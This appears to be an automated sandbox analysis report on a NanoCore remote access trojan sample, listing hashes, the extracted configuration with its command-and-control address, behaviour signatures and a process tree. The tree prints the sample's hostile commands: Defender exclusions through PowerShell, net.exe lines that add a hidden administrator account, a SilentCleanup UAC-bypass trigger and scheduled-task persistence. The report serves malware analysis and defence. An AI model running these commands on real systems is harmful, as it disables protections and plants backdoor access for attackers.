Analysis
-
max time kernel
84s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
10-09-2022 06:11
General
-
Target
ab80f58dd166cd4f196cf3b62ee67a79.exe
-
Size
910KB
-
MD5
ab80f58dd166cd4f196cf3b62ee67a79
-
SHA1
80935c3e16b27fa4155cf3350e5b474780ce2157
-
SHA256
e527276384d145defb319a3c2adeb52e7825e5a7f8f7459ebc368c31a4018f03
-
SHA512
b9f72c372b6a17056731ba2a10a7b650d197dcdb248c607b0e5381258be35f418f5c14e17a9cf871297a0076220a3c34a1845ea069c8ec092d8827c8e65ecd63
-
SSDEEP
12288:DtwTf4WsfpMOXFmr9MdSo4lhwC1+0PfebD4oJ5Smp/TeGm2qtpRG6YOle:DuTf4WqMOX0r9MUwvafdIfb6
Malware Config
Extracted
nanocore
1.2.2.0
91.193.75.252:26000
670fa9dd-919d-4725-a07d-c6601d2cb896
-
activate_away_mode
true
-
backup_connection_host
91.193.75.252
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2022-06-15T07:03:22.565789536Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
26000
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
670fa9dd-919d-4725-a07d-c6601d2cb896
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
91.193.75.252
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 4 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Windows security modification 2 TTPs 5 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 62 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks BIOS information in registry
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators ADMIN~1 /add3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup users "Admin" /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users "Admin" /add3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators "Admin" /del3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"C:\Users\Admin\AppData\Local\Temp\ab80f58dd166cd4f196cf3b62ee67a79.exe"2⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DDP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp8801.tmp"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DDP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp8C29.tmp"3⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD53374ad41868fdbb535ee2c710381b5ea
SHA12638d6d088a518333c3008de941c39c9ba85aafd
SHA256204fe26ba4c2f76eeaf879c80443d25c4d39b0fc438b2e793167d53beaf9c9d6
SHA512bbb2fc5b003536eee8d4484f1fa382ec8262984e68fd005e04df714dab183d6eff143476385af2786a0424c85fa7c19e32ab5eba6f60b2623bcf4cc41c6b290e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5102261940c11b599f11376a30ec5acde
SHA1d5b17c85c7cd2e127773e685f6f9a10d9934c97f
SHA256b5e5a9b009f920de535a28271aec78bd6ac1b9ee9582e91d223b9ba429f02d72
SHA51227d3ad56e66f81549f0f98ff59149f040007b3ea89af8b3d35f2927f4623175577e9377e1c8d1802b17144899d58cfa169e15aa2d5c5ad979cf1c4e0401b74dd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD566b2ff785ff27742f67dc5058171a848
SHA144f1b623366a347e77355f8a14da71f11e91ce9a
SHA2560121cc3539fe607a3b5232d49c4040ec9187cd3417b4c6e3e4dfafc35b53a667
SHA512626e205db0083e1f0b38dc7176d8dab0f9f768b20c11c34ecda66c00a33286707ad37be6b4a30d23421d943c394085418f0a54d3c11099f71ed67b4e083686f9
-
C:\Users\Admin\AppData\Local\Temp\tmp8801.tmpFilesize
1KB
MD5627529ddb708e81b54ad8604036e2ce8
SHA1812f36ecf264ad950d2d1223a72516ec0ed53b31
SHA2566c3fbebc7f27f0a69ce6a2869b3621fbc73867d6d976546fad4c945728e9a33e
SHA5129b60e5d48efe9d14a9f496771d75ea0f3ebbaac125dd2d04b0b8e80faaf77842a2ab4ebd4f4b13b0dc3325b6e3affbc526069c73ba6fd823717fdbf25e8037eb
-
C:\Users\Admin\AppData\Local\Temp\tmp8C29.tmpFilesize
1KB
MD52271642ca970891700e3f48439739ed8
SHA1cd472df2349f7db9e1e460d0ee28acd97b8a8793
SHA2567aba66abbcb0b13455609174db23aed495a9adbef0e0acd28baa9c92445eda68
SHA5124669a4ef8ec28cdb852ffc1401576b1bf9a9d837797d7d92bc88c18b3097404f36854e50167b309706fef400cabc43c876569ce2797ba85eb169a2783b8fe807
-
memory/520-150-0x0000000000000000-mapping.dmp
-
memory/1008-143-0x0000000000000000-mapping.dmp
-
memory/1012-169-0x0000000000000000-mapping.dmp
-
memory/1176-147-0x0000000000000000-mapping.dmp
-
memory/1248-142-0x0000000000000000-mapping.dmp
-
memory/1900-156-0x0000000000000000-mapping.dmp
-
memory/1992-174-0x00000000701D0000-0x000000007021C000-memory.dmpFilesize
304KB
-
memory/1992-153-0x0000000000000000-mapping.dmp
-
memory/3152-164-0x0000000000000000-mapping.dmp
-
memory/3328-148-0x0000000000000000-mapping.dmp
-
memory/3348-157-0x0000000000000000-mapping.dmp
-
memory/3348-158-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/3348-162-0x00000000058F0000-0x00000000058FA000-memory.dmpFilesize
40KB
-
memory/3348-159-0x0000000005980000-0x0000000005A12000-memory.dmpFilesize
584KB
-
memory/3484-170-0x00000000073A0000-0x0000000007436000-memory.dmpFilesize
600KB
-
memory/3484-135-0x0000000000000000-mapping.dmp
-
memory/3484-175-0x0000000007350000-0x000000000735E000-memory.dmpFilesize
56KB
-
memory/3484-137-0x0000000002510000-0x0000000002546000-memory.dmpFilesize
216KB
-
memory/3484-138-0x00000000051D0000-0x00000000057F8000-memory.dmpFilesize
6.2MB
-
memory/3484-139-0x0000000004D30000-0x0000000004D52000-memory.dmpFilesize
136KB
-
memory/3484-177-0x0000000007440000-0x0000000007448000-memory.dmpFilesize
32KB
-
memory/3484-176-0x0000000007460000-0x000000000747A000-memory.dmpFilesize
104KB
-
memory/3484-160-0x00000000063E0000-0x0000000006412000-memory.dmpFilesize
200KB
-
memory/3484-161-0x00000000701D0000-0x000000007021C000-memory.dmpFilesize
304KB
-
memory/3484-146-0x0000000005E10000-0x0000000005E2E000-memory.dmpFilesize
120KB
-
memory/3484-163-0x00000000063C0000-0x00000000063DE000-memory.dmpFilesize
120KB
-
memory/3484-165-0x0000000007760000-0x0000000007DDA000-memory.dmpFilesize
6.5MB
-
memory/3484-166-0x0000000007110000-0x000000000712A000-memory.dmpFilesize
104KB
-
memory/3484-141-0x0000000005100000-0x0000000005166000-memory.dmpFilesize
408KB
-
memory/3484-167-0x0000000007180000-0x000000000718A000-memory.dmpFilesize
40KB
-
memory/3500-132-0x0000000000AA0000-0x0000000000B88000-memory.dmpFilesize
928KB
-
memory/3500-133-0x00000000054C0000-0x000000000555C000-memory.dmpFilesize
624KB
-
memory/3500-134-0x0000000008190000-0x0000000008734000-memory.dmpFilesize
5.6MB
-
memory/3500-136-0x0000000007CB0000-0x0000000007D16000-memory.dmpFilesize
408KB
-
memory/3636-149-0x0000000000000000-mapping.dmp
-
memory/4032-145-0x0000000000000000-mapping.dmp
-
memory/4212-172-0x00000000701D0000-0x000000007021C000-memory.dmpFilesize
304KB
-
memory/4212-151-0x0000000000000000-mapping.dmp
-
memory/4236-152-0x0000000000000000-mapping.dmp
-
memory/4236-173-0x00000000701D0000-0x000000007021C000-memory.dmpFilesize
304KB
-
memory/4584-144-0x0000000000000000-mapping.dmp
-
memory/4748-155-0x0000000000000000-mapping.dmp
-
memory/4752-154-0x0000000000000000-mapping.dmp
-
memory/4868-140-0x0000000000000000-mapping.dmp